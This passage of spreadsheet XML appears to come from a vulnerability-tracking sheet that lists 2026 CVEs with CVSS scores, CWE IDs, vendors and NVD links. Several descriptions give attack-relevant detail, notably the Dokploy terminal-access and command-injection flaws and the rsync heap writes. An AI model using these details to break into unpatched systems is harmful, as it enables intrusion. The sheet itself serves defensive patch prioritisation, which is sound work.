      </c>
      <c r="D909" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G909" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H909" s="5" t="inlineStr"/>
      <c r="I909" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L909" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="C910" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D910" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G910" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H910" s="5" t="inlineStr"/>
      <c r="I910" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L910" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70456</t>
        </is>
      </c>
      <c r="C911" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D911" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G911" s="5" t="inlineStr"/>
      <c r="H911" s="5" t="inlineStr"/>
      <c r="I911" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J911" s="5" t="inlineStr"/>
      <c r="K911" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L911" s="5" t="inlineStr">
        <is>
          <t>rsync 3.0.1 before 3.5.0 contains an out-of-bounds write vulnerability in the read_args() function that allows a malicious sender to corrupt adjacent heap memory by sending a crafted argument list. When the argument count causes the argv allocation to be exactly full, the trailing NULL terminator is written one slot beyond the allocation boundary, corrupting adjacent heap memory.</t>
        </is>
      </c>
      <c r="M911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70456</t>
        </is>
      </c>
    </row>
    <row r="912">
      <c r="A912" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70458</t>
        </is>
      </c>
      <c r="C912" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D912" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E912" s="5" t="inlineStr"/>
      <c r="F912" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G912" s="5" t="inlineStr"/>
      <c r="H912" s="5" t="inlineStr"/>
      <c r="I912" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J912" s="5" t="inlineStr"/>
      <c r="K912" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L912" s="5" t="inlineStr">
        <is>
          <t>rsync 3.0.0 before 3.5.0 contains an out-of-bounds write vulnerability that allows attackers to corrupt memory by triggering HLINK_BUMP processing on file entries with the FLAG_HLINKED flag set while the hard-link preservation option is inactive. Attackers can exploit the missing F_SUM field in the file_struct layout to access memory past the end of the allocated structure, corrupting adjacent heap or stack data.</t>
        </is>
      </c>
      <c r="M912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70458</t>
        </is>
      </c>
    </row>
    <row r="913">
      <c r="A913" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="C913" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D913" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E913" s="5" t="inlineStr"/>
      <c r="F913" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G913" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H913" s="5" t="inlineStr"/>
      <c r="I913" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J913" s="5" t="inlineStr"/>
      <c r="K913" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L913" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="914">
      <c r="A914" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="C914" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D914" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E914" s="5" t="inlineStr"/>
      <c r="F914" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G914" s="5" t="inlineStr"/>
      <c r="H914" s="5" t="inlineStr"/>
      <c r="I914" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J914" s="5" t="inlineStr"/>
      <c r="K914" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L914" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="C915" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D915" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G915" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H915" s="5" t="inlineStr"/>
      <c r="I915" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L915" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="C916" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D916" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E916" s="5" t="inlineStr"/>
      <c r="F916" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G916" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H916" s="5" t="inlineStr"/>
      <c r="I916" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L916" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71694</t>
        </is>
      </c>
      <c r="C917" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D917" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E917" s="5" t="inlineStr"/>
      <c r="F917" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="inlineStr"/>
      <c r="I917" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L917" s="5" t="inlineStr">
        <is>
          <t>An issue in Berkeley Out-of-Order Machine (BOOM) / BoomTile RTL benchmark v1.2 2d08d0d8b4563212175212f9db0e69f6e68c9619 allows a remote attacker to execute arbitrary code via the CSR trap-return state restoration logic, MRET handling logic, mstatus.MPRV update path, CSRFile logic in ProcessorFuzz BOOM benchmark Benchmarks/Verilog/SmallBoomTile_v1.2_state.v</t>
        </is>
      </c>
      <c r="M917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71694</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71808</t>
        </is>
      </c>
      <c r="C918" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D918" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G918" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H918" s="5" t="inlineStr"/>
      <c r="I918" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote authenticated attackers to execute arbitrary SQL commands via the ${} string concatenation in AdminMapper.java and multiple other Mapper files (including MerchantWithdrawRecordMapper.java and MemberWithdrawRecordMapper.java).</t>
        </is>
      </c>
      <c r="M918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71808</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72866</t>
        </is>
      </c>
      <c r="C919" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D919" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="inlineStr"/>
      <c r="I919" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L919" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the WebSocket handler in apps/dokploy/server/wss/terminal.ts validates a session but does not authorize access to the requested server. An authenticated user can connect to /terminal?serverId=local, select the special serverId=local branch, and obtain an interactive terminal on the Dokploy host without an organization role or server-access check. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72866</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72875</t>
        </is>
      </c>
      <c r="C920" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D920" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="inlineStr"/>
      <c r="I920" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L920" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, settings.readTraefikFile in apps/dokploy/server/api/routers/settings.ts passes a path accepted by apiReadTraefikConfig to readConfigInPath in packages/server/src/utils/traefik/application.ts, where configPath is interpolated into execAsyncRemote as cat ${configPath}, allowing a user with traefikFiles.read permission to execute arbitrary commands on a managed server through shell metacharacters. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72875</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72883</t>
        </is>
      </c>
      <c r="C921" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D921" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G921" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H921" s="5" t="inlineStr"/>
      <c r="I921" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L921" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the WebSocket handlers in apps/dokploy/server/wss/terminal.ts, apps/dokploy/server/wss/docker-container-terminal.ts, apps/dokploy/server/wss/docker-container-logs.ts, and apps/dokploy/server/wss/docker-stats.ts validate organization membership but do not enforce checkServiceAccess, accessedServerIds, or accessedServices, allowing an authenticated organization member to obtain root terminal access and read logs or statistics for restricted servers and services. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72883</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="C922" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D922" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G922" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H922" s="5" t="inlineStr"/>
      <c r="I922" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L922" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="C923" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D923" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G923" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H923" s="5" t="inlineStr"/>
      <c r="I923" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L923" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="C924" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D924" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E924" s="5" t="inlineStr"/>
      <c r="F924" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G924" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H924" s="5" t="inlineStr"/>
      <c r="I924" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L924" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="C925" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D925" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E925" s="5" t="inlineStr"/>
      <c r="F925" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G925" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H925" s="5" t="inlineStr"/>
      <c r="I925" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L925" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="C926" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D926" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E926" s="5" t="inlineStr"/>
      <c r="F926" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G926" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H926" s="5" t="inlineStr"/>
      <c r="I926" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L926" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="C927" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D927" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E927" s="5" t="inlineStr"/>
      <c r="F927" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G927" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H927" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I927" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L927" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="C928" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D928" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E928" s="5" t="inlineStr"/>
      <c r="F928" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G928" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H928" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I928" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L928" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72986</t>
        </is>
      </c>
      <c r="C929" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D929" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E929" s="5" t="inlineStr"/>
      <c r="F929" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="inlineStr"/>
      <c r="I929" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L929" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="C930" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D930" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E930" s="5" t="inlineStr"/>
      <c r="F930" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G930" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H93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30" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L930" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="C931" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G931" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H931" s="5" t="inlineStr"/>
      <c r="I931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L931" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="C932" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G932" s="5" t="inlineStr">
        <is>
          <t>windows</t>
